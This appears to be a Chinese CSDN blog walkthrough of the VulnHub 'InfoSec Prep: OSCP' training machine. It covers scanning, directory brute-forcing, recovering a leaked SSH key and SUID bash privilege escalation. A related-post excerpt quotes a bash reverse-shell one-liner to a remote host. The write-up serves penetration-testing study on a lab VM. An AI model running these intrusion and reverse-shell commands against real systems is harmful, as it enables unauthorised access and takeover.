oscp靶机教程

已于 2023-08-13 18:56:47 修改
阅读量273 收藏
点赞数 2
文章标签: 网络安全
于 2023-08-13 18:17:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68723119/article/details/132262266
版权

这个靶机适合新手,因为步骤很短很短

靶机下载地址:https://www.vulnhub.com/entry/infosec-prep-oscp,508/
在这里插入图片描述

1.使用命令 arp-scan -l 列出当前局域网的所有设备,在oscp的网络适配器查看到的mac地址和扫描出来的192.168.211.141的MAC地址一致。
在这里插入图片描述
2. 使用nmap来扫描oscp
在这里插入图片描述3. 从扫描结果可以看到有22和80端口,先访问一下80端口网页。
在这里插入图片描述
全是英文,看不懂,翻译一下
在这里插入图片描述
只有一个用户“oscp”,要么它就是root,要么就是它是唯二用户

4.具体扫描目录,查看网页

dirsearch -u http://192.168.211.141/
[dirsearch]是一个基于python的命令行工具,用于暴力扫描页面结构,包括网页中的目录和文件
在这里插入图片描述访问一下robots.txt
在这里插入图片描述
翻译一下,不允许?这不是此地无银三百两吗
在这里插入图片描述访问secret.txt,发现好东西了
在这里插入图片描述
找网站使用base64对内容进行解密,好家伙,是ssh连接私钥,找到宝了
在这里插入图片描述
在/.ssh下创建一个名为id_rsa的文件,将私钥复制进去,设置权限

在~/.ssh下面创建一个名为id_rsa的文件,注意要给~/.ssh 700权限,给id_rsa 600权限,否定无法访问密钥,ssh登录不成功

在这里插入图片描述
在这里插入图片描述
登录成功就该提权找flag了

先找一下有哪些我们可以利用的了,目前我们的用户是普通用户可以通过find命令找找一些特权命令,借助它可以从普通用户提升为root

find / -perm -u=s -type f 2> /dev/null

在这里插入图片描述
看到了bash,很亲切,去gtfobin搜索一下提权方法
在这里插入图片描述

提权找到flag
[外链图片转存中...(img-tbofSOQL-1691920230240)]提权找到flag

山君之季子
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
靶机实战(10):OSCP备考之VulnHub Tre 1
OneMoreThink
01-07 1059
靶机官网:Tre: 1[1]实战思路:一、主机发现二、端口发现(服务、组件、版本)三、漏洞发现(获取权限)8082端口/HTTP服务组件漏洞URL漏洞(目录、文件)80端口/HTTP服务组件漏洞URL漏洞(目录、文件)22端口/SSH服务组件漏洞口令漏洞80端口/HTTP服务URL漏洞(目录、文件)四、提升权限tre用户sudosuidcron后记一、主机发现本次攻击指定IP,不涉及主机发现过程。...
靶机实战(9):OSCP备考之VulnHub BTRSys v2.1
OneMoreThink
01-06 943
靶机官网:BTRSys: v2.1[1]实战思路:一、主机发现二、端口发现(服务、组件、版本)三、漏洞发现(获取权限)21端口/FTP服务组件漏洞口令漏洞22端口/SSH服务组件漏洞口令漏洞80端口/HTTP服务组件漏洞URL漏洞(目录、文件)四、提升权限www-data用户sudosuidcron内核提权信息收集btrisk用户sudo一、主机发现本次攻击指定IP,不涉及主机发现过程。二、端口发...
2024年网络安全笔记day01
最新发布
2401_84253132的博客
05-03 1036
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!2、选择vmnet0网卡(桥接网卡),这步的意思就是将虚拟机的网卡连接到vmnet0交换机上。最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!对于从来没有接触过网络安全的同学,我们帮你准备了详细的。
OSCP靶机----OnSystemShellDredd
qq_53003652的博客
09-13 182
从WEB到内网&&FTP匿名&&SSH密钥登录&&SUID提权
【oscp系列-Lampiaos】靶机2
weixin_44807430的博客
01-16 236
日拱一卒
OSCP练习:vulhub靶机TR0LL 1攻略
weixin_47311099的博客
04-13 267
信息收集 主机发现 nmap -sC -sV 192.168.8.132 发现21、22、80端口 网站信息收集 访问80端口,没啥有用信息 访问ftp 使用 Anonymous 匿名用户登录,密码为空。发现lol.pcap文件 下载lol.pacp文件 在downloads中发现lol.pcap下载成功 使用wireshark打开lol.pcap 对ftp流量包进行分析 首先使用Anonymous登录ftp服务器,syst命令获取系统版本为unix type l8 接下来又尝试访问10.0.0
网络安全攻防界的OSCP、CISP-PTE、CISP-PTS、CISP-IRE、CISP-IRS
jennycisp的博客
08-10 1704
关注网络安全攻防领域的筒子们,肯定对OSCP、CISP-PTE、CISP-PTS、CISP-IRE、CISP-IRS不陌生,但是关于他们直减的区别,今儿想做个分享。
OSCP备考分享
一杯咖啡的渗透记忆
10-10 1425
先说说个人的情况。首先,我并不能算作严格意义上安全科班出身,属于半路出家做安全。一直以来都是从事甲方安全防护,偏重基于业务侧的应用安全、数据保护、隐私合规。渗透测试于我几乎是盲区一样的存在,仅对web、android的安全测试有些许了解,比如漏洞原理、防护、测试等,利用层面都很少接触。​ 起初是从之前的同事那里了解到CEH,一个偏重攻击实操的认证,但是考试需要去香港,觉得比较麻烦就放弃了。之后一段时间也没计划学习渗透的知识,随着工作越来越久,逐渐体会到”不知攻,焉知防“的意思。
OSCP学习笔记总结(本资料禁止转载)
热门推荐
Shadow的博客
10-19 1万+
OSCP学习笔记 第零章实战学习 反弹shell bash -i >&/dev/tcp/192.168.1.1/4444 0>&1 切换交互式shell python -c 'import pty;pty.spawn("/bin/sh")' 查看系统型号:lab_release -a 查看系统版本:uname -a 查看目标主机网页内容:dirb http://192.168.1.1:80 查看网页漏洞:nikto -h 192.168.1.1 --useprox.
oscp学习(一)
qq_48514193的博客
02-20 1656
oscp
“突破重围:探索OSCP渗透测试场景中的难题与解决方案“
A485860941的博客
07-17 942
在OSCP渗透测试认证中,靶场的红队是极具挑战性和实战性的对手,他们不仅拥有深厚的安全知识和技能,还能模拟真实世界中的攻击场景。本文将探索OSCP靶场中超级厉害的红队,介绍他们的攻击策略和技术手段,并分享一些应对策略和解决方案,帮助渗透测试人员更好地应对实际攻击。
1-OSCP自学笔记-October靶机练习1
08-04
0、前言本教程为《OSCP自学笔记-靶机练习》系列之一的《October靶机练习》,在这个系列中笔者将抽取10台典型靶机作为练习目标,以OSCP学习及考试的角度
OSCP-Preparation-Guide:我准备OSCP认证的指南
03-13
OSCP准备指南 我准备OSCP认证的指南。
oscp推荐的训练靶机raven2渗透过程
07-05
oscp推荐的训练靶机raven2渗透过程
OSCP认证学习资源汇总.zip
08-19
0x0001-OSCP学习资料PWK v1.15-带书签 0x0002-OSCE学习资料-CPTV 1.0 0x0003-OSCP考试命令大全 0x0004-INE机构OSCP课程 0x0005-bof真题文件 0x0006-缓冲区溢出题目全套解决方案 0x0007-OSCP报告模板参考 0x0008-题型...
OSCP-PWK:https
04-27
OSCP 提供了更好的阅读体验,因为回购协议大多类似于草稿和备份。 注释和备忘单位于Wiki页面中。 回购中充斥着TryHackMe编写的内容和二进制文件。 卡利配置 ohmyzsh + powerlevel10K + tmux Kali 2020.3的提示:...
OSCP网络安全认证
10-19
OSCP认证,是一个专门针对Kali Linux渗透测试培训课程的专业认证。该认证机构声称,OSCP认证是一个区别于所有其它认证的考试,考试全程采取手动操作的方式,而不设笔试环节。
靶机实战(5):OSCP备考之VulnHub SUNSET DECOY
OneMoreThink
01-02 1050
靶机官网:SUNSET: DECOY[1]实战思路:主机发现端口发现(服务、组件、版本) 1漏洞发现(获取权限) 222端口/SSH服务 2组件漏洞 2口令漏洞 280端口/HTTP服务 2组件漏洞 2URL漏洞(目录、文件) 3越权提权 601、sudo 602、suid03、信息收集 704、tty 905、sudo 906、suid07、信息收集 1108、chkrootkit一、主机发现本...
【oscp系列-Lord Of The Root-1.0.1】靶机6
weixin_44807430的博客
01-16 230
知行合一
oscp relia
12-21
OSCP(Offensive Security Certified Professional)是一种信息安全认证,它着重于渗透测试和攻击技术。OSCP认证考试涵盖了网络渗透测试、漏洞利用、社会工程学和渗透测试工具的使用等内容。持有OSCP认证的专业人员通常具有深厚的渗透测试技能和经验,能够有效地识别和利用系统和网络中存在的漏洞,进而提供相应的建议和解决方案,以提高组织的安全性防御水平。 OSCP认证对于从事信息安全领域的专业人士来说,具有非常高的含金量和认可度。通过攻克OSCP认证考试,不仅可以提升个人在行业内的知名度和竞争力,还能够为个人的职业发展带来更多的机会和挑战。因此,越来越多的安全从业者和企业选择通过学习和考取OSCP认证来提升自己在渗透测试领域的专业能力和地位。 总的来说,OSCP认证是一项具有挑战性和实用性的信息安全认证,它能够帮助从业者全面提升自己的技术水平和职业发展前景。持有OSCP认证的渗透测试专业人员不仅拥有丰富的实战经验,还能够为企业提供专业、高效的安全防御与风险管理服务。因此,OSCP认证在当前信息安全行业中拥有非常重要的地位和价值。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值